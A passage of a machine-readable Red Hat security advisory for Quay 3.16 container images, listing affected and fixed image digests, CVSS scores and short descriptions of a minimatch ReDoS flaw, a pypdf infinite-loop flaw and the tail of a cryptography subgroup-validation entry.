"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "HIGH",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 7.4,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "cryptography: cryptography Subgroup Attack Due to Missing Subgroup Validation for SECT Curves"
},
{
"cve": "CVE-2026-26996",
"cwe": {
"id": "CWE-1333",
"name": "Inefficient Regular Expression Complexity"
},
"discovery_date": "2026-02-20T04:01:11.896063+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2441268"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in minimatch. A remote attacker could exploit this Regular Expression Denial of Service (ReDoS) vulnerability by providing a specially crafted glob pattern. This pattern, containing numerous consecutive wildcard characters, causes excessive processing and exponential backtracking in the regular expression engine. Successful exploitation leads to a Denial of Service (DoS), making the application unresponsive.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "minimatch: minimatch: Denial of Service via specially crafted glob patterns",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploitation of this flaw requires that a user or service processes untrusted input.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-26996"
},
{
"category": "external",
"summary": "RHBZ#2441268",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2441268"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-26996",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-26996"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26996"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5",
"url": "https://github.com/isaacs/minimatch/commit/2e111f3a79abc00fa73110195de2c0f2351904f5"
},
{
"category": "external",
"summary": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26",
"url": "https://github.com/isaacs/minimatch/security/advisories/GHSA-3ppc-4f35-3m26"
}
],
"release_date": "2026-02-20T03:05:21.105000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T15:21:25+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6567"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "minimatch: minimatch: Denial of Service via specially crafted glob patterns"
},
{
"cve": "CVE-2026-27628",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"discovery_date": "2026-02-25T04:02:09.864561+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:1ea5311ae56a211c4424a42d023745b962e8d322bb77097773d4621f0c0d5e91_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2c1cb5de345c1ad4cb605d9b22ebbf1b0b0f8fbae51ebe04f63c522d4a27938e_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9bc7b33061b26d6192081ce3fd9fcf2b7c3be9cd9b7901bbc0893d2db87017f2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:fdcdd27be37044e0ab7b599ccc825b4ab3b3a77cb82d5436462098602a6b5a8d_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:7cb7b3d876d95c43ff147d72a46a832119050f7a337e0c0e83bd35ef82df0588_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:4ed1d4a7fe3bf6e4bb19551ae6e9349a50e5b3e7e003c8624fbfa9179d6a9dad_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:96331c01153e9fe30375a824093c827be40f5ed757341845b1becc31aba21361_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:b5a1f05b332a19479f08a5493c47c088602e06983abf894c4bf86c51d0ba392f_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2442543"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in pypdf. Processing a specially crafted PDF document, specifically with circular /Prev references in the cross-reference (xref) chain, can cause an infinite loop and a high consumption of CPU, resulting in a denial of service.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "pypdf: possible infinite loop when loading circular /Prev entries in cross-reference streams",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "To exploit this flaw, an attacker must be able to supply a crafted PDF file to be processed by an application using the pypdf library. This issue can cause the application to enter an infinite loop and consume a high amount of CPU resources, eventually resulting in a denial of service with no other security impact. Due to these reasons, this vulnerability has been rated with a moderate impact.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:5937639bb3bc4fd76c1dfa9d1550f8ab955a5d12b44794c076d127a5ba4d68a4_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:701d55bb5aa5d095dc759a4e07d2c7e647c401bb13e4dd868afec2ee66f51406_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:8298307eb70190d303ad03a1b44a183df1e0fb5aa8f146e4abd028ea82d0aaf2_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:efe1b48667d21b1bc7c7d7b9c320be3e47f5679984079f1d4b976247e34ef087_arm64"
],
"known_not_affected": [
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:618838ba45069cb93c48acc40c19186a5e471d4ea17f8f057a5187e74d196a9b_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:6f505834f4023e94f791769bb6726d24e8e94605ee525d4f657b38ec2810e06f_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:bbd4e466a0973195c134bc7bd406a824a5e205201559931d2975fd337b435e7c_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:d5ad15db6f5f6271dbff37712024fb3aee765d29a88c58b65be8a174fdfffa04_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:22039703011a8853c57bad658c5d6d4b44543a8924d24b0c6e1eeb47a4092152_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:361f6631b82a6b550dcbd1ae3748229fd72e2b9ab5dfb537f326f680ded5700f_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:ce3149ec9752b6d48be532e33be903a30746237b27e5daa3d64358533981ddee_ppc64le",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:1d0b2c18a32a5e1195a65e2c6fe5c79f8acd1695a56e848302621a87e5ec041c_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:053e4754b5cae3086a44d302f5dc3254e4d7e312b154972774c5793d988846e8_amd64",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:cd0cec48f12c48bcaaeb5393be4a05d14d2bdad5d0c6071f3a1d4281fd43b58d_s390x",
"Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:f5bd5ebf3c14a2320c7196c895df050b0dd605603f1a2fadff6901f3fdd44194_ppc64le",
